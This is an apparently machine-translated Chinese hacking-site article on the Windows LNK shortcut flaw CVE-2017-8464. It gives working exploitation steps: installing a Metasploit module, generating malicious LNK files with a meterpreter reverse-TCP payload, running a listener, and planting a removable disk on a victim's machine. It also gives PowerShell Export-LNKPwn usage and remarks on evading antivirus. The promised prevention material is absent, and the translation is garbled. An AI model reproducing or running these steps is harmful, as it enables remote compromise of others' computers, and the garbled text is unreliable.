“The seismic network of the third generation”（CVE-2017-8464 several species using the method and prevention-vulnerability and early warning-the black bar safety net

As early as 6 May 13, Microsoft released patches to fix numbered CVE-2017-8464 vulnerability, a local user or a remote attacker can exploit this vulnerability to generate a specially crafted shortcut, and through a removable device or a remote shared way lead to remote code execution, Dating back to the past, the NSA recognized the use of similar vulnerabilities and to“Olympic Game”for the code developed Stuxnet virus, to prevent Iran from developing nuclear weapons.
CVE-2017-8464 vulnerability affects versions:
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Use
1 in Metasploit-Framework in the use of CVE-2017-8464

1. First download the latest zip package【download】, download after the completion of the compressed package inside the modules/exploits/windows/fileformat in cve_2017_8464_lnk_rce. rb is copied to the directory/usr/share/metasploit-framework/modules/exploits/windows/fileformat.
2. Just copy the rb file will be an error, must then be compressed within the package data/exploits in the cve-2017-8464 folder copy to/usr/share/metasploit-framework/data/exploits.
3. Open a terminal
   msfconsole
   use exploit/windows/fileformat/cve_2017_8464_lnk_rce
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST [your IP address]
   Trojan
   ! [](/Article/UploadPic/2017-8/20178711814896. png? www. myhack58. com)
   ! [](/Article/UploadPic/2017-8/20178711814375. png? www. myhack58. com)
   After/root/. msf4/local, it will generate our desired files, generate so much and the letter is concerned, are left with no space.
4. Continue to enter the command
   use multi/handler
   set paylaod windows/meterpreter/reverse_tcp
   set LHOST [your IP address]
   run
5. The removable disk inserted into the drone, if the drone on auto play, select the Browse for a file when you can rebound.
   ! [](/Article/UploadPic/2017-8/20178711814631. png? www. myhack58. com)
   Demo:
   ! [](/Article/UploadPic/2017-8/20178711814509. gif? www. myhack58. com)
   *2）PowerShell
   This using the Powershell method is not the previous network spread of the CVE-2017-8464 reproduction method.
   First of all download the Export-LNKPwn. ps1【Click here】
   Note:
   -Need 4. 0 or above. NET Library version, the authors use a number only PowerShell 5.0 is only some of the constructors like new (), the 他打算将版本要求降低到.NET 3.5 and PowerShell 2.0, so it module in all the target environments can be loaded into memory.
   -The authors want to expand the function, so the user can generate the original Stuxnet LNK exp（CVE-2010-2568, and solve the bypass issue CVE-2015-0096 in it.
   -Antivirus will handle your LNK, and more than ready to escape detection!
   Parameter Description:
   LNKOutPath: local save the LNK file’s full path.
   TargetCPLPath: local/remote target cpl of the full path.
   Type: used FolderDataBlock type,“SpecialFolderDataBlock”and“KnownFolderDataBlock”two.
   Example of use:
   C:\PS> The Export-LNKPwn-LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -Type SpecialFolderDataBlock
   C:\PS> The Export-LNKPwn-LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -Type KnownFolderDataBlock